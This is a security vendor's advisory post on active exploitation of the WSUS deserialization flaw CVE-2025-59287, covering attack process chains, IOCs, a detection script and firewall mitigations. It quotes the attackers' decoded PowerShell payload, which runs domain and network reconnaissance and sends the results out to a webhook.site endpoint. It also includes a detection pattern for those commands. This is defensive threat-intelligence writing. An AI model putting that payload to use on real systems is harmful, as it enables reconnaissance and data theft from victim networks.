Urgent: Microsoft WSUS Remote Code Execution Vulnerability Exploited

Edward Zhou

CEO & Co-Founder

October 28, 2025 3 min read

TL;DR

This article details the critical WSUS vulnerability, CVE-2025-59287, which allows remote code execution. It covers active exploitation by threat actors, the technical details of the flaw affecting various Windows Server versions, and specific attack methodologies observed by security researchers. Essential remediation steps, including immediate patching and temporary workarounds like disabling the WSUS role or blocking ports, are provided to help organizations secure their systems.

WSUS Attacks Exploiting CVE-2025-59287

Multiple organizations are affected by attacks exploiting a critical Windows Server Update Services (WSUS) remote code execution vulnerability identified as CVE-2025-59287. Security researchers and threat intelligence teams are actively monitoring the exploitation of this flaw. Microsoft released an emergency patch and CISA added the bug to its Known Exploited Vulnerabilities catalog.

Microsoft has not yet updated its advisory to acknowledge the active exploitation. Google Threat Intelligence Group (GTIG) stated that it is actively investigating exploitation of CVE-2025-59287 by a newly identified threat actor, UNC6512, across multiple victim organizations. GTIG observed the actor conducting reconnaissance and exfiltrating data from compromised hosts.

Technical Details of CVE-2025-59287

CVE-2025-59287 affects Windows Server versions 2012 through 2025. It stems from insecure deserialization of untrusted data, allowing unauthenticated attackers to execute arbitrary code on vulnerable systems. Servers without the WSUS role enabled are not affected. Initial fixes for CVE-2025-59287 were issued on October's Patch Tuesday, but these did not fully address the vulnerability, necessitating an emergency update.

Trend Micro's Zero Day Initiative reported approximately 100,000 hits exploiting this bug within seven days and estimates that nearly 500,000 internet-facing servers have the WSUS service enabled. Palo Alto Networks' Unit 42 observed a limited number of impacted customers; its analysis indicates that attackers are focused on gaining initial access and performing internal network reconnaissance.

Attack Methodology and Observations

Unit 42 observed the following methodology in attacks exploiting CVE-2025-59287:

  • Initial Access: Attackers target publicly exposed WSUS instances on default TCP ports, 8530 (HTTP) and 8531 (HTTPS).
  • Execution: Malicious PowerShell commands are spawned beneath the WSUS service process (wsusservice.exe) or the HTTP worker process (w3wp.exe). Huntress observed similar process chains:
    • wsusservice.exe → cmd.exe → cmd.exe → powershell.exe
    • w3wp.exe → cmd.exe → cmd.exe → powershell.exe
  • Reconnaissance: Initial payloads gather intelligence on the internal network environment, including commands like whoami, net user /domain, and ipconfig /all.
  • Data Exfiltration: Collected information is exfiltrated to a remote, attacker-controlled Webhook.site endpoint using a PowerShell payload or curl.exe.

Cortex Xpanse identified approximately 5,500 WSUS instances exposed to the internet. Huntress Labs observed threat actors exploiting the WSUS vulnerability across multiple customers, starting around 2025-10-23 23:34 UTC.
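As an added example (not code from the article, Huntress or Unit 42), the following PowerShell reconstructs process ancestry from process-creation events and reports any powershell.exe whose chain runs back to wsusservice.exe or w3wp.exe, whatever the number of intermediate cmd.exe hops. The events, PIDs and paths are constructed for illustration; the function name and field names are assumptions.

```powershell
# Added example, not code from the article or Huntress: flag powershell.exe whose
# process ancestry includes wsusservice.exe or w3wp.exe, the chains reported above.
# Events are CONSTRUCTED for illustration; in practice map Sysmon Event ID 1 or
# Security Event ID 4688 records into the same four fields.
$enc = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('net user /domain; ipconfig /all'))
$events = @(
    [pscustomobject]@{ Pid = 4120; PPid = 900;  Image = 'C:\Program Files\Update Services\Service\WsusService.exe'; CommandLine = 'WsusService.exe' }
    [pscustomobject]@{ Pid = 5204; PPid = 4120; Image = 'C:\Windows\System32\cmd.exe'; CommandLine = "cmd.exe /c cmd.exe /c powershell -ec $enc" }
    [pscustomobject]@{ Pid = 5210; PPid = 5204; Image = 'C:\Windows\System32\cmd.exe'; CommandLine = "cmd.exe /c powershell -ec $enc" }
    [pscustomobject]@{ Pid = 5222; PPid = 5210; Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; CommandLine = "powershell -ec $enc" }
    [pscustomobject]@{ Pid = 6001; PPid = 700;  Image = 'C:\Windows\explorer.exe'; CommandLine = 'explorer.exe' }
    [pscustomobject]@{ Pid = 6010; PPid = 6001; Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; CommandLine = 'powershell -File C:\Scripts\backup.ps1' }
)

function Find-WsusSpawnedPowerShell {
    param([object[]]$Events)
    $byPid = @{}
    foreach ($e in $Events) { $byPid[[int]$e.Pid] = $e }
    $riskyAncestors = @('wsusservice.exe', 'w3wp.exe')
    $reconPattern   = 'whoami|net user /domain|ipconfig /all|webhook\.site'

    foreach ($ps in $Events | Where-Object { $_.Image -match '\\powershell\.exe$' }) {
        # Walk ParentProcessId links upward, collecting image names child-first.
        $chain = @(); $cur = $ps
        while ($null -ne $cur) {
            $chain += [IO.Path]::GetFileName($cur.Image).ToLowerInvariant()
            $cur = $byPid[[int]$cur.PPid]
        }
        if (-not ($chain | Where-Object { $riskyAncestors -contains $_ })) { continue }

        # Decode a -ec/-EncodedCommand argument (UTF-16LE base64) so the recon
        # commands and exfil host named in the article can be matched in clear text.
        $decoded = ''
        if ($ps.CommandLine -match '(?i)(^|\s)-e(c|ncodedcommand)?\s+([A-Za-z0-9+/=]+)') {
            try { $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[3])) } catch { }
        }
        [array]::Reverse($chain)
        [pscustomobject]@{
            Pid          = $ps.Pid
            Chain        = $chain -join ' -> '
            EncodedCmd   = [bool]$decoded
            ReconOrExfil = [bool](($ps.CommandLine + ' ' + $decoded) -match $reconPattern)
        }
    }
}

Find-WsusSpawnedPowerShell -Events $events | Format-List
```

Only the PowerShell rooted at WsusService.exe is reported; the one launched from explorer.exe is ignored, and the decoded -ec argument is what lets the net user /domain and ipconfig /all strings match.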

Remediation and Mitigation

Microsoft has recommended temporary workarounds for organizations unable to immediately deploy the emergency patches. As of Oct. 27, the guidance consisted of the following mitigations:

  1. Disable the WSUS Server Role: Disabling the WSUS role removes the attack vector, but prevents the server from distributing updates.
  2. Block High-Risk Ports: Block all inbound traffic to TCP ports 8530 and 8531 on the host-level firewall.
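The two interim mitigations above, written out as an added example rather than Microsoft's own script. It assumes an elevated PowerShell session on the WSUS server with the built-in NetSecurity and ServerManager modules; the firewall rule name and the -RemoveRole switch are assumptions.

```powershell
# Added example, not Microsoft's own script: apply the two interim mitigations
# listed above on a WSUS host that cannot take the emergency update yet.
# Run in an elevated PowerShell session on the server. The rule name is an assumption.
param([switch]$RemoveRole)

$wsusPorts = 8530, 8531
$ruleName  = 'Block-WSUS-Inbound-CVE-2025-59287'

# 0. Exposure check: is anything still listening on the WSUS ports?
Get-NetTCPConnection -LocalPort $wsusPorts -State Listen -ErrorAction SilentlyContinue |
    Select-Object LocalAddress, LocalPort, OwningProcess

# 1. Host firewall: block all inbound TCP traffic to 8530 (HTTP) and 8531 (HTTPS)
#    on every profile. Idempotent: the rule is created only once.
if (-not (Get-NetFirewallRule -DisplayName $ruleName -ErrorAction SilentlyContinue)) {
    New-NetFirewallRule -DisplayName $ruleName -Direction Inbound -Protocol TCP `
        -LocalPort $wsusPorts -Action Block -Profile Any -Enabled True | Out-Null
}
# Verify the rule is enabled and carries the expected port filter.
Get-NetFirewallRule -DisplayName $ruleName | ForEach-Object {
    $ports = ($_ | Get-NetFirewallPortFilter).LocalPort -join ','
    '{0}: Enabled={1} Action={2} TCP/{3}' -f $_.DisplayName, $_.Enabled, $_.Action, $ports
}

# 2. Optional: remove the WSUS role entirely. This removes the attack surface, but
#    the server stops distributing updates until the role is reinstalled.
$feature = Get-WindowsFeature -Name UpdateServices
if ($RemoveRole -and $feature.Installed) {
    Uninstall-WindowsFeature -Name UpdateServices -Restart:$false
} elseif ($feature.Installed) {
    Write-Warning 'WSUS role is still installed; rerun with -RemoveRole to uninstall it.'
}
```

Once the emergency update is installed, the blocking rule can be removed with Remove-NetFirewallRule -DisplayName and the role reinstalled if it was removed.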

CISA urges organizations to implement Microsoft's updated guidance for the WSUS Remote Code Execution Vulnerability.

Huntress Labs Observations

Figure 1: wsusservice.exe → cmd.exe → cmd.exe → powershell.exe

Image courtesy of Huntress Labs

Huntress Labs observed attackers leveraging exposed WSUS endpoints to send specially crafted requests that triggered a deserialization RCE against the update service. Exploitation activity included spawning Command Prompt and PowerShell via the HTTP worker process and WSUS service binary. Proxy networks were used by the attackers to conduct and obfuscate exploitation.

The PowerShell payload (base64 decoded) used by attackers is:

powershell -ec
try{$r= (&{echo https://[REDACTED]:8531; net user /domain; ipconfig /all} |out-string)+ $Error }catch{$_.ToString()} ;$w="http://webhook.site/[REDACTED]";try{iwr -UseBasicParsing -Uri $w -Body $r -Method Put}catch{curl.exe -k $w --data-binary $r}

This payload enumerates the server for sensitive network and user information and exfiltrates the results to a remote webhook.

Indicators of Compromise (IOCs)

Huntress Labs identified the following IOCs:

  • C:\Program Files\Update Services\Logfiles\SoftwareDistribution.log: WSUS log file to review for indicators of compromise.
  • C:\inetpub\logs\LogFiles\W3SVC*\u_ex*.log: HTTP service log files to review for indicators of compromise.
  • w3wp.exe: HTTP worker process binary.
  • wsusservice.exe: WSUS service process binary.
  • whoami;net user /domain: Observed enumeration command.
  • net user /domain; ipconfig /all: Observed enumeration command.

Edward Zhou

CEO & Co-Founder of Gopher Security, leading the development of Post-Quantum cybersecurity technologies and solutions.
